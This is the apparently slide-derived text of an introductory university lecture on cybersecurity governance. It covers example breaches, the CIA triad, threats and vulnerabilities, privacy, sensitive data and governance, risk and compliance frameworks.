Cybersecurity Governance

ITSS 4362

Week 2 – Intro to CSG

Professor Khan
Introduction to Cybersecurity

Learning Objectives
• Understand the context Cybersecurity
• Cybersecurity defined
• Cybersecurity Focus
• Cost of Cybercrimes
• Goal of Cybersecurity
• CIA Triad (Confidentiality / Integrity / Availability)
• Threats and Vulnerabilities
• Threat Landscape
• Attack Vectors
• Organizational Safeguards
• Cybersecurity Awareness
• Cybersecurity Statistics
• Cybersecurity Governance
Cyber Breaches
What

• Online retailer of custom mugs and apparel was hacked for a four-month period in the latter half of
2018

How

• Malicious card skimming code placed on its payment website

Theft

• Hackers were able to steal full payment card details (number, security code, and expiration date),
names, addresses, phone numbers, email addresses, and postal codes.

Impact

• While the company didn’t say how many clients were affected, reported in the tens of thousands, given
the amount of transactions that occurred on the website during the months-long breach.
Cyber Breaches

What

• Alaska Department of Health & Social Services (DHSS)

How

• A preliminary investigation found that the virus bypassed multiple layers of security, and that the infected
computer — which stored confidential documents on clients — interacted with Russia-based IP addresses.

Theft

• The attacker was able to access names, social security numbers, dates of birth, addresses, health information,
benefit information and other personal information such as income.

Impact

• Exposed data on at least 100,000 people

Cyber Breaches

What

• University of Washington Medical

How

• A vulnerability on the health network’s website server exposed protected health information
including names, medical record numbers, and a description of each individual’s information.

Theft

• Fortunately no Medical records were exposed

Impact

• Nearly 1 million patients data exposed

Cyber Breaches
What

• City of Tallahassee

How

• The out-of-state, third-party vendor that hosts the city's payroll services was hacked and as a result the direct deposit
paychecks were redirected. Employees throughout the city’s workforce were affected.

Theft

• City officials responsible for investigating the incident suspect the cyberattack came from a foreign nation.

Impact

• Nearly $500,000 of the city of Tallahassee employees’ payroll was stolen by hackers who redirected direct deposits into an
unauthorized account.
Cybersecurity Defined

• Cybersecurity’s goal: Protect our

information and information systems

• Cybersecurity is: “Protection of

information systems against
unauthorized access to or modification
of information, whether in storage,
processing or transit, and against the
denial of service to authorized users,
including those measures necessary to
detect, document, and counter such
threats.”
CIA Triad

Integrity: Results from Availability: Making sure

the protection of that your information is
unauthorized available when you need it
modification or (by making back-up copies
destruction of information. and, if appropriate, storing
the back-up copies off-site)

Confidentiality: Safeguards information from being accessed by

individuals without the proper clearance, access level, and need to know.
Cybersecurity Focus

• Keeping the Bad Guys out

• Protecting your Internal Network

• Recovering from an Attack

• Security is Everyone’s responsibility

Potential Impact of Cyber Attacks

Reputation
• May harm the reputation of an organization in the eyes of their customers / clients / among
competitors / partners / businesses/ government agencies

Legal
• May result in violation of laws or contract requirements
• Risk of prosecution, financial penalties, or withdrawal of existing and future funding

Economic
• May undermine the ability to capitalize on potential intellectual property or knowledge transfer

Operational
• May disrupt normal operations and result in significant remedial cost
Evolution of Technology vs Cyber Threats
Cybersecurity and Emerging Technologies

Internet of Things

Nation State Actors

Blockchain and
Cryptocurrencies
Cyber Espionage Cyberwar Cybercrime

Machine Learning / Automation / Artificial Intelligence

Internet of Things
Fraud / Identity Regulatory
Theft / Protection Evolution Cloud / Virtualization
Barriers in Addressing Cybersecurity Issues
Cost of Cybercrime
Threats and Vulnerabilities

• What are we protecting our and our

stakeholders information from?
– Threats--any circumstances or events that
can potentially harm an information system by
destroying it, disclosing the information stored
on the system, adversely modifying data, or
making the system unavailable
– Vulnerabilities--weakness in an information
system or its components that could be
exploited.
Threat Landscape
Sources of Threats
Organizational Safeguards
2019 Cybersecurity Talent Gap
Privacy Defined

• Information privacy, or data privacy:

the relationship between collection
and dissemination of data,
technology, the public expectation
of privacy, and the legal and
political issues surrounding them.

• Information privacy is the right to

control what information about a
person is released.
Sensitive Data
• Information is considered sensitive if the loss of
Confidentiality, Integrity, or Availability could be
expected to have a serious, severe, or
catastrophic adverse effect on organizational
operations, organizational assets, or individuals.

• Types of sensitive information include:

– Personnel
– Financial
– Payroll
– Medical
Cybersecurity Awareness
Governance, Risk, and Compliance

Governance, Risk, and Compliance (GRC) Framework:

• A framework for the leadership, organization, and
operation of the institution's IT areas to ensure
that those areas support and enable the
institution's strategic objectives.

GRC programs align institutional activities with

larger institutional goals (i.e., governance) and
allow the identification of challenges and
opportunities (i.e., risk), and when internal
requirements and external mandates are lined up
(i.e., compliance), institutional activities have the best
chance for success—especially in stormy weather or
where danger lurks.
Governance Continued

Executive
Approve
Executive Mgmt/
Leadership CIO

Define Enterprise Policy CISO

and Standards

Interpret Operational Line of Line of

Governance Business Business

Human
Implement Operations Resources
Datacenter
Holistic Cybersecurity Governance Program

Quality
Assurance /
Quality
Control

Risk Adherence to
Management LRRs

Governance
Program

Process
Adherence
Audits
and
Oversight

Education
and
Socialization
Goal of this course
- Understanding of the importance of Cybersecurity and
Governance programs in relation to organizational goals.

- The ability to build a Cybersecurity Program.

- Explain and understand Risk Management in relation to

Information Technology.

- Explain and understand Technology Audits, InfoSec Policy,

Standards, and LRRs.